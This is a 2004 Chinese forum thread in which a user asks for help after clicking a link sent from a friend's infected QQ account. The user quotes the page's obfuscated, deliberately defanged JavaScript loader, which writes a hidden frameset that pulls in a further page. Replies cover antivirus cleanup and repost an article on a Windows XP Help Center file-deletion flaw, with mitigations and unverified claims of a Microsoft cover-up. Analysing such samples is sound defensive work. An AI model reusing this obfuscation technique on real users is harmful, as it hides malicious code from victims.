求助，这的高人多，帮忙看看

2222

一朋友的QQ中毒了，自动发消息，我以为是他发的，就点了发过来的连接，后他说不是他发的，晕，我看了那个网页的原代码是

<SCRIPT LANG UAGE="JavaS cript">
<!--
var HtmlS trings=["=gsbnftfu!spxt>#551/1#!dp mt>#+#>
 =gs bnf!tsd>#nn/iun#!gsb nfcp","sefs>#op#!tdspm mjoh>#bvup#!o psftj{f!nbs hjoxjeui>#1#!nbs hjoifj","hiu>#1#>
=0gsb nftfu>"];
fun ction psw(st){
  v ar v arS;
  v arS="";
  va r i;
  f or(v ar a=0;a<st.len gth;a++){
    i = st.charCod eAt(a);
    if (i==1)
      varS=varS+Stri ng.fromCh arCode('"'.charCo deAt()-1);
    els e if (i==2) {
      a++;
      varS+=Str ing.fromCh arCode(st.charCo deAt(a));
      }
    els e
      var S+=St ring.fro mCharCode(i-1);
  }
  re turn va rS;
};
var nu m=3;
fun cti on S(){
f or( i =0;i<num;i++)
  docu ment.wr ite(p sw(HtmlSt rings[i]));}
S();
// -->
</SCR IPT>
我把每个单词都随便加了个空格，免得在论坛上要是运行起来就麻烦了

看看这里面有什么机关，怎么办？

freelong

研究这个？

雪狼孩

我从来不盲目点QQ里的连接，即使是点也是要经过对方确认后打开防火墙才点.
你用杀毒软件杀杀看吧,不行的话删除QQ重新安装.

bwishs

哈哈，毒

2222

我也下了RavQQMsender.exe，杀了没有发现毒。

“你用杀毒软件杀杀看吧,不行的话删除QQ重新安装” 这种病毒是将QQ重新装就给搞掉吗？ 以前还没有遇到过，他感染了就是感染QQ，不干其他的坏事情吗？

雪狼孩

Originally posted by 2222 at 2004-8-14 06:00 PM:
我也下了RavQQMsender.exe，杀了没有发现毒。

“你用杀毒软件杀杀看吧,不行的话删除QQ重新安装” 这种病毒是将QQ重新装就给搞掉吗？ 以前还没有遇到过，他感染了就是感染QQ，不干其他的坏事情吗？

现在大多下木马,其实对网赚没直接影响，不过消耗资源罢了，找木马客星杀杀看

freelong

format

2222

靠
查看进程中有个不熟悉的程序：HelpCtr.exe
用GG一搜索这个程序的介绍，吓人啊：

看看WindowsXP是怎么被恶意攻击的！[图]
日期：2003年12月30日 作者： 人气：314 查看:[大字体 中字体 小字体]  

微软匆匆发布Windows XP SP1可能是想掩盖其操作系统的脆弱性，Windows XP甚至使黑客们可以删除访问某种WEB页面的计算机上的文件。一个西班牙站点声称，Windows XP系统中存在一个缺陷，使得任何人都可以删除用户电脑上的文档。如果点击了一个带有恶意攻击的链接，或者访问一个恶意的Web站点，可能出现一个HTML格式的消息接收页面，遇到这种情况电脑上的某些文档就可能被删除。同时该站点上给出了一个示例。如果桌面上突然出现下面的页面，千万不要关闭它，否则它会删掉电脑里的所有信息！

遇到这种情况，按下Ctrl+Shift+ESC组合键，启动任务管理器，杀掉HelpCtr.exe这个进程。

另外对于高级用户来说也可以通过删除或者移动引起该恶意操作的文件来避免悲剧的发生，该文件UPLDDRVINFO.HTM，它的路径:\Windows\PCHEALTH\HELPCTR\SYSTEM\DFS\uplddrvinfo.htm。删除或者移动文件的位置后，前面的页面就会因为找不到文件的路径而出现页面错误，如下图所示。这时就可以安全地关闭弹出的窗口了。经过测试，该文件对于系统的正常运行没有影响。

?说得更清楚些，如果点击了一个特殊构造的URL链接，这种系统的脆弱性使系统中任何目录所包含的文件都可能被删除。这种URL可能出现在任何地方，比如恶意的电子邮件中、聊天室里、新闻组、恶意的Web页面或者甚至当你的计算机访问了一个页面，恶意的操作就可以被执行。

??看来这是一个非常致命的漏洞，并且微软也在竭力掩饰这个秘密。另外有人称在TechTV上看到一个报道，其中说微软11周之前就已经知道该漏洞，但是由于该漏洞非常容易被利用，因此公司一直保守这个秘密。

??微软在催促Windows XP用户下载Service Pack，尽快安装在系统上。Windows XP SP1是个很大的文件，文件的CD版本目前只能在美国和加拿大可以找到。

aoshao

Originally posted by 红尘￡滚滚 at 2004-8-14 12:13 PM:
http://it.rising.com.cn/service/technology/RS_QQMsender.htm

工具名称：RavQQMsender.exe
版 本 号：3.2
软件大小：104 KB



应用平台：Windows平台
更新时间：2004-08-11
发布时间 ...

美女与野兽我喜欢！！！
这个美女是谁啊？？

aoshao

不要光笑啊···
介绍一下哦····

aoshao

谢谢你啊 ！！！！

让你看看我的桌面！！

ydw8

哈哈，强